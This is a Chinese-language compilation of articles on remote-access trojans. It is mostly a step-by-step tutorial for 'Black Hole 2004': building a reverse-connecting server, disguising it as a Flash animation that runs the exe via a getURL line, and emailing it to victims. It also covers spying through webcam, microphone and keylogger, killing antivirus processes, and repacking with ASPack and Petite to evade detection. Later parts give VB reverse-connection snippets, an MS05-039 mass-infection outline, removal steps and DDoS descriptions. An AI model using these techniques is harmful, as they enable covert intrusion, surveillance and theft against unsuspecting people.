本文目录一览:
黑客种植木马的方法及防范策
相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的。今天,笔者就以最新的一款木马程序——黑洞2004,从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的病毒防火墙,因为杀毒软件会把木马作为病毒的一种进行查杀。 操作步骤: 一、种植木马 现在网络上流行的木马基本上都采用的是C/S 结构(客户端/服务端)。你要使用木马控制对方的电脑,首先需要在对方的的电脑中种植并运行服务端程序,然后运行本地电脑中的客户端程序对对方电脑进行连接进而控制对方电脑。 为了避免不熟悉木马的用户误运行服务端,现在流行的木马都没有提供单独的服务端程序,而是通过用户自己设置来生成服务端,黑洞2004也是这样。首先运行黑洞2004,点击“功能/生成服务端”命令,弹出“服务端配置”界面。由于黑洞2004采用了反弹技术(请参加小知识),首先单击旁边的“查看”按钮,在弹出的窗口中设置新的域名,输入你事先申请空间的域名和密码,单击“域名注册”,在下面的窗口中会反映出注册的情况。域名注册成功以后,返回“服务端配置”界面,填入刚刚申请的域名,以及“上线显示名称”、“注册表启动名称”等项目。为了迷惑他人,可以点“更改服务端图标”按钮为服务端选择一个图标。所有的设置都完成后,点击“生成EXE型服务端”就生成了一个服务端。在生成服务端的同时,软件会自动使用UPX为服务端进行压缩,对服务端起到隐藏保护的作用。 服务端生成以后,下一步要做的是将服务端植入别人的电脑?常见的方法有,通过系统或者软件的漏洞入侵别人的电脑把木马的服务端植入其的电脑;或者通过Email夹带,把服务端作为附件寄给对方;以及把服务端进行伪装后放到自己的共享文件夹,通过P2P软件(比如PP点点通、百宝等),让网友在毫无防范中下载并运行服务端程序。 由于本文主要面对普通的网络爱好者,所以就使用较为简单的Email夹带,为大家进行讲解。我们使用大家经常会看到的Flash动画为例,建立一个文件夹命名为“好看的动画”,在该文件夹里边再建立文件夹“动画.files”,将木马服务端软件放到该文件夹中假设名称为“abc.exe”,再在该文件夹内建立flash文件,在flash文件的第1帧输入文字“您的播放插件不全,单击下边的按钮,再单击打开按钮安装插件”,新建一个按钮组件,将其拖到舞台中,打开动作面板,在里边输入“on (press) {getURL("动画.files/abc.exe");}”,表示当单击该按钮时执行abc这个文件。在文件夹“好看的动画”中新建一个网页文件命名为“动画.htm”,将刚才制作的动画放到该网页中。看出门道了吗?平常你下载的网站通常就是一个.html文件和一个结尾为.files的文件夹,我们这么构造的原因也是用来迷惑打开者,毕竟没有几个人会去翻.files文件夹。现在我们就可以撰写一封新邮件了,将文件夹“好看的动画”压缩成一个文件,放到邮件的附件中,再编写一个诱人的主题。只要对方深信不疑的运行它,并重新启动系统,服务端就种植成功了。 二、使用木马 成功的给别人植入木马服务端后,就需要耐心等待服务端上线。由于黑洞2004采用了反连接技术,所以服务端上线后会自动和客户端进行连接,这时,我们就可以操控客户端对服务端进行远程控制。在黑洞2004下面的列表中,随便选择一台已经上线的电脑,然后通过上面的命令按钮就可以对这台电脑进行控制。下面就简单的介绍一下这些命令的意义。 文件管理:服务端上线以后,你可以通过“文件管理”命令对服务端电脑中的文件进行下载、新建、重命名、删除等操作。可以通过鼠标直接把文件或文件夹拖放到目标文件夹,并且支持断点传输。简单吧? 进程管理:查看、刷新、关闭对方的进程,如果发现有杀毒软件或者防火墙,就可以关闭相应的进程,达到保护服务器端程序的目的。 窗口管理:管理服务端电脑的程序窗口,你可以使对方窗口中的程序最大化、最小化、正常关闭等操作,这样就比进程管理更灵活。你可以搞很多恶作剧,比如让对方的某个窗口不停的最大化和最小化。 视频监控和语音监听:如果远程服务端电脑安装有USB摄像头,那么可以通过它来获取图像,并可直接保存为Media Play可以直接播放的Mpeg文件;需要对方有麦克风的话,还可以听到他们的谈话,恐怖吧? 除了上面介绍的这些功能以外,还包括键盘记录、重启关机、远程卸载、抓屏查看密码等功能,操作都非常简单,明白了吧?做骇客其实很容易。 三、隐藏 随着杀毒软件病毒库的升级,木马会很快被杀毒软件查杀,所以为了使木马服务端辟开杀毒软件的查杀,长时间的隐藏在别人的电脑中,在木马为黑客提供几种可行的办法。 1.木马的自身保护 就像前面提到的,黑洞2004在生成服务端的时候,用户可以更换图标,并使用软件UPX对服务端自动进行压缩隐藏。 2.捆绑服务端 用户通过使用文件捆绑器把木马服务端和正常的文件捆绑在一起,达到欺骗对方的目的。文件捆绑器有广外文件捆绑器2002、万能文件捆绑器、exeBinder、Exe Bundle等。 3.制做自己的服务端 上面提到的这些方法虽然能一时瞒过杀毒软件,但最终还是不能逃脱杀毒软件的查杀,所以若能对现有的木马进行伪装,让杀毒软件无法辨别,则是个治本的方法。可以通过使用压缩EXE和DLL文件的压缩软件对服务端进行加壳保护。例如Step1中的UPX就是这样一款压缩软件,但默认该软件是按照自身的设置对服务端压缩的,因此得出的结果都相同,很难长时间躲过杀毒软件;而自己对服务端进行压缩,就可以选择不同的选项,压缩出与众不同的服务端来,使杀毒软件很难判断。下面我就以冰河为例,为大家简单的讲解一下脱壳(解压)、加壳(压缩)的过程。 如果我们用杀毒软件对冰河进行查杀,一定会发现2个病毒,一个是冰河的客户端,另一个是服务端。使用软件“PEiD”查看软件的服务端是否已经被作者加壳。 现在,我们就需要对软件进行脱壳,也就是一种解压的过程。这里我使用了“UPXUnpack”,选择需要的文件后,点击“解压缩”就开始执行脱壳。 脱壳完成后,我们需要为服务端加一个新壳,加壳的软件很多,比如:ASPack、ASProtect、UPXShell、Petite等。这里以“ASPack”为例,点击“打开”按钮,选择刚刚脱壳的服务端程序,选择完成后ASPack会自动为服务端进行加壳。再次用杀毒软件对这个服务端进行查杀,发现其已经不能识别判断了。如果你的杀毒软件依旧可以查杀,你还可以使用多个软件对服务端进行多次加壳。笔者在使用Petite和ASPack对服务端进行2次加壳后,试用了多种杀毒软件都没有扫描出来。现在网络中流行的很多XX版冰河,就是网友通过对服务端进行修改并重新加壳后制做出来的。 四、防范 防范重于治疗,在我们的电脑还没有中木马前,我们需要做很多必要的工作,比如:安装杀毒软件和网络防火墙;及时更新病毒库以及系统的安全补丁;定时备份硬盘上的文件;不要运行来路不明的软件和打开来路不明的邮件。 最后笔者要特别提醒大家,木马除了拥有强大的远程控制功能外,还包括极强的破坏性。我们学习它,只是为了了解它的技术与方法,而不是用于盗窃密码等破坏行为,希望大家好自为之。 小知识:反弹技术,该技术解决了传统的远程控制软件不能访问装有防火墙和控制局域网内部的远程计算机的难题。反弹端口型软件的原理是,客户端首先登录到FTP服务器,编辑在木马软件中预先设置的主页空间上面的一个文件,并打开端口监听,等待服务端的连接,服务端定期用HTTP协议读取这个文件的内容,当发现是客户端让自己开始连接时,就主动连接,如此就可完成连接工作。因此在互联网上可以访问到局域网里通过 NAT (透明代理)代理上网的电脑,并且可以穿过防火墙。与传统的远程控制软件相反,反弹端口型软件的服务端会主动连接客户端,客户端的监听端口一般开为80(即用于网页浏览的端口),这样,即使用户在命令提示符下使用“netstat -a”命令检查自己的端口,发现的也是类似“TCPUserIP:3015ControllerIP:httpESTABLISHED”的情况,稍微疏忽一点你就会以为是自己在浏览网页,而防火墙也会同样这么认为的。于是,与一般的软件相反,反弹端口型软件的服务端主动连接客户端,这样就可以轻易的突破防火墙的限制。
反弹端口型木马的基本简介
1 一般木马的工作过程
木马程序有两部分组成,一部分是服务器(Server)端程序,服务端运行后,会在本机打开一个特定的网络端口监听客户端的连接。另一部分是客户(Client)端程序,即控制在攻击者手中的程序,攻击者通过它获取远程计算机的数据并通过它控制远程计算机。攻击者用客户端去连接服务端计算机的特定端口,进行登录,发出控制命令等,进而取得对计算机的控制权限,可以任意查看或删改服务端文件,操作服务端的注册表 ,获取服务端的系统信息 ,窃取口令等 ,就如同访问他自己的计算机一样方便。
其过程可用 VB 实现如下:(Horse_Server 和Horse_Client 均为 Winsock控件) :
服务端:
Horse_Server. LocalPort = 31339 (打开一个特定的网络端口)
Horse_Server.Listen(监听客户端的连接)
客户端
Horse_Client . RemoteHost = RemotelP (设远端地址为服务器端IP地址)
Horse_Client . RemotePort = 31339(设远程端口为服务端程序起动的特定端口)
Horsec_Client . Connect (连接服务端计算机)
一旦服务端接到客户端的连接请求 ConnectionRequest ,就接受连接。
Private Sub Horse_Server_ConnectionRequest (ByVal requestlD As Long)
Horse_Server.Accept requestlD
End Sub
客户机端用 Horse_Client . SendData 发送命令 ,而服务器在 Horse_Server_DataArrive事件中接受并执行命令(如:修改注册表、删除文件等) 。
如果客户断开连接 ,则服务端连接并重新监听端口:
Private Sub Horse_Server_Close ()
Horse_Server. Close (关闭连接)
Horse_Server.Listen(再次监听)
End Sub[1 ]
2 反弹端口型木马的工作原理
一般木马服务端运行后,会用邮件、ICQ 等方式发出信息通知入侵者,同时在本机打开一个网络端口监听客户端的连接(时刻等待着客户端的连接) 。收到信息后,入侵者再运行客户端程序向服务器的这一端口提出连接请求(Connect Request) ,服务器上的守护进程就会自动运行,来应答客户机的请求。
目前,由于大部分防火墙对于连入的连接往往会进行非常严格的过滤,能对非法端口的IP包进行有效的过滤,非法连接被拦在墙外,客户端主动连接的木马,现已很难穿过防火墙。
与一般的软件相反,反弹端口型木马是把客户端的信息存于有固定IP的第三方FTP服务器上,服务端从 FTP 服务器上取得信息后计算出客户端的IP和端口,然后主动连接客户端。另外,网络神偷的服务端与客户端在进行通信 ,是用合法端口,把数据包含在像HTTP或FTP的报文中,这就是黑客们所谓的“隧道”技术。其过程如下:
服务端:
Horse_Server. RemoteHost = RemotelP(设远端地址为从指定FTP服务器取得的客户端IP地址)
Horse_Server. RemotePort = RemotePort (设远程端口为客户端程序起动的特定端口,如:80、21等)
Horse_Server. Connect (连接客户端计算机)
客户端:
Horse_Client . LocalPort = LocalPort (打开一个特定的网络端口,如:80、21等)一旦客户端接到服务端的连接请求 ConnectionRequest ,就接受连接。
Private Sub Horse_Client_ConnectionRequest(ByVal requestlD As Long)
Horse_Client .Accept requestlD
End Sub
Horse_Client .Listen(监听客户端的连接)客户机端用Horse_Client . SendData 发送命令,而服务器在 Horse_Server DataArrive事件中接受并执行命令。如果客户断开连接,则服务器端关闭连接:
Private Sub Horse_Server_Close ()
Horse_Server. Close (关闭连接)
End Sub
之后每隔一段时间服务端就会向客户发一个连接请求:Horse_Server. Connect (连接客户端计算机)
目前,大部分防火墙对于连入的连接往往会进行非常严格的过滤,但对于连出的连接却疏于防范。像这种“反弹端口”原理的木马,又使用“隧道”技术,客户端的监听端口开在防火墙信任的端口上,把所有要传送的数据全部封装到合法的报文里进行传送,防火墙就不会拦截。如80(提供HTTP服务的端口)或21(提供FTP服务的端口),它会认为内部用户在浏览网页或进行文件传输,则木马穿过防火墙。其实即使用户使用端口扫描软件检查自己的端口,对类似TCP local address :1026 foreign address :80 ESTABLISHED的情况也未必注意。这样,反弹端口型木马不但可以穿过防火墙,而且可以通过HTTP、SOCKS4/ 5 代理,甚至还能访问局域网内部的电脑。像用NAT透明代理和HTTP的 GET型代理等的局域网,还有拨号上网、ISDN、ADSL 等的主机,都有可能。
3 查杀方法
对是不是中了反弹端口型木马我们可以做如下检查:
(1)关掉所有的网络连接程序(如:IE浏览器、FTP服务等) ,转入命令行状态用netstat -a命令,netstat命令的功能是显示网络连接、路由表和网络接口信息,可以让用户得知目前都有哪些网络连接正在运行。
(2)用网络监视软件,如:sniffer、IParmor 等查一下自己怀疑的端口是否被侦听。如在(1)中发现类似TCP local address :1026 foreign address :HTTP ESTABLISHED(或者是类似TCP local address :1045 foreign address:FTPESTABLISHED)的情况或在(2)中发现怀疑的端口被侦听,有可能中了此类木马。
目前发现的反弹端口型木马有网络神偷和灰鸽子(辐射版)两种。如果中了反弹端口型的木马,对于网络神偷,我们可以用下面的方法清除:
(1)查看注册表启动项HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中的可疑键值(键名是在生成服务端时由用户设置的)并删除(做这一步必须对Windows注册表非常熟悉),重启后,再删除系统目录(C:\Windows\System)中的服务端程序(文件名也是由用户设置的) 。
(2)在中了木马的机器上运行客户端程序,可以再生成并运行新的配置正确的服务端,就会把原来的服务端冲掉。重新运行客户间 ,在客户端的“服务端在线列表”找到自己并连接上,再用菜单“网络” — “远程卸载” ,就可以彻底清除。
对于灰鸽子,由于此软件原理与其他同类软件不同,它的服务端只有生成它的客户端才能访问,其他人是不可能访问的,所以不能用自动卸载的方法清除它 ,只能手工清除:先删除注册表启动项
(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)
(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices)
(HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)
中的可疑键值(键名是在生成服务端时由用户设置的)。重启后,再删除系统目录(C:\Windows\System)中的服务端程序(文件名也是由用户设置的)。最后检查一下是不是木马程序与EXE关联,如果与EXE关联则修改注册表:(HKEY_CLASSES_ROOT\exefile\shell\open\command\)默认值为:“%1”% 3。否则删除服务端程序后什么程序也不能运行了。
由于以前的木马都是客户端主动连接,所以目前大部分防火墙对于连入的连接往往会进行非常严格的过滤,对付木马我们只要在防火墙上设置为只能连出不能连进,就可一劳永逸了。然而反弹端口型木马的出现对传统的防火墙提出了新的要求:防火墙不但要防外还要防内,即应用程序访问网络规则,过滤那些存在于用户计算机内部的各种不法程序对网络的应用,从而可以有效的防御像“反弹式木马”那样的骗取系统合法认证的非法程序。当用户计算机内部的应用程序访问网络的时候,必须经过防火墙的内墙的审核。但这也带来一些问题:我们在访问网络的时候必须手工确认哪些程序合法,这个工作可能非常烦琐。再者对一个电脑入门者,决策哪些程序合法也是一个非常困难的问题。防,随着攻的发展始终存在不完善之处,但是却始终遵循一个原则:魔高一尺,道高一丈。
如何防御反弹连接技术
答:反弹技术的诞生,是为了解决传统的远程控制软件不能访问装有防火墙以及不能控制局域网内部的远程计算机。
域名反弹连接的原理很简单。服务端程序运行后,主动连接一个网络域名或IP地址,而本地用户通过客户端程序及时将电脑当前的IP地址及打开的端口更新到网络域名,这样服务端程序就可以成功连接到客户端,从而完成连接。因此通过反弹连接技术就可以在互联网上轻松访问到局域网里通过 NAT (透明代理)代理上网的电脑,并且可以穿过防火墙。
微软的MS05-039高危漏洞,就可以利用具有反弹连接功能的工具来攻击。使用编写的两个不同的批处理文件,让扫描出存在漏洞的远程计算机,自动地连接到本地计算机。然后在远程计算机上执行FTP命令,下载黑客设置的木马程序。这样就能获取了大量的肉鸡。
防御反弹连接还是很容易的。安装网络防火墙,对需要连接到网络的程序进行有效的甄别,对那些不熟悉的程序的连接请求一律不予通过。需要注意的是,某些国产防火墙会让IE浏览器、Outlook Express等操作系统中的程序不经允许就访问网路。最好将默认的规则通过改为询问或禁止即可。除此以外,还可以将常用工具使用的端口和程序本身进行关联,接着将其不需要的端口屏蔽,这样可以保证电脑更加安全。
怎么用反弹技术实施ddos攻击
DDoS攻击通过大量合法的请求占用大量网络资源,以达到瘫痪网络的目的。 这种攻击方式可分为以下几种:
通过使网络过载来干扰甚至阻断正常的网络通讯;
通过向服务器提交大量请求,使服务器超负荷;
阻断某一用户访问服务器;
阻断某服务与特定系统或个人的通讯。
IP Spoofing
IP欺骗攻击是一种黑客通过向服务端发送虚假的包以欺骗服务器的做法。具体说,就是将包中的源IP地址设置为不存在或不合法的值。服务器一旦接受到该包便会返回接受请求包,但实际上这个包永远返回不到来源处的计算机。这种做法使服务器必需开启自己的监听端口不断等待,也就浪费了系统各方面的资源。
LAND attack
这种攻击方式与SYN floods类似,不过在LAND attack攻击包中的原地址和目标地址都是攻击对象的IP。这种攻击会导致被攻击的机器死循环,最终耗尽资源而死机。
ICMP floods
ICMPfloods是通过向未良好设置的路由器发送广播信息占用系统资源的做法。
Application
与前面叙说的攻击方式不同,Application level floods主要是针对应用软件层的,也就是高于OSI的。它同样是以大量消耗系统资源为目的,通过向IIS这样的网络服务程序提出无节制的资源申请来迫害正常的网络服务。
什么是反弹式木马啊?
一、什么是反弹式木马
我们都知道,所谓的“特洛伊木马”,就是一种基于“客户机/服务器”模式的远程控制程序,它让用户的机器运行服务器端的程序,这个服务器端的程序会在用户的计算机上打开监听的端口。这就给黑客入侵用户计算机打开了一扇进出的门,然后黑客就可以利用木马的客户端入侵用户的计算机系统。
随着防火墙技术的提高和发展,基于IP包过滤规则来拦截木马程序可以很有效地防止外部连接,因此黑客在无法取得连接的情况下,也无所作为。
然而,“道高一尺,魔高一丈”这个安全领域里的“规律”无时不在起作用。聪明的木马程序员又发明了所谓的“反弹式木马”??它利用防火墙对内部发起的连接请求无条件信任的特点,假冒是系统的合法网络请求来取得对外的端口,再通过某些方式连接到木马的客户端,从而窃取用户计算机的资料同时遥控计算机本身。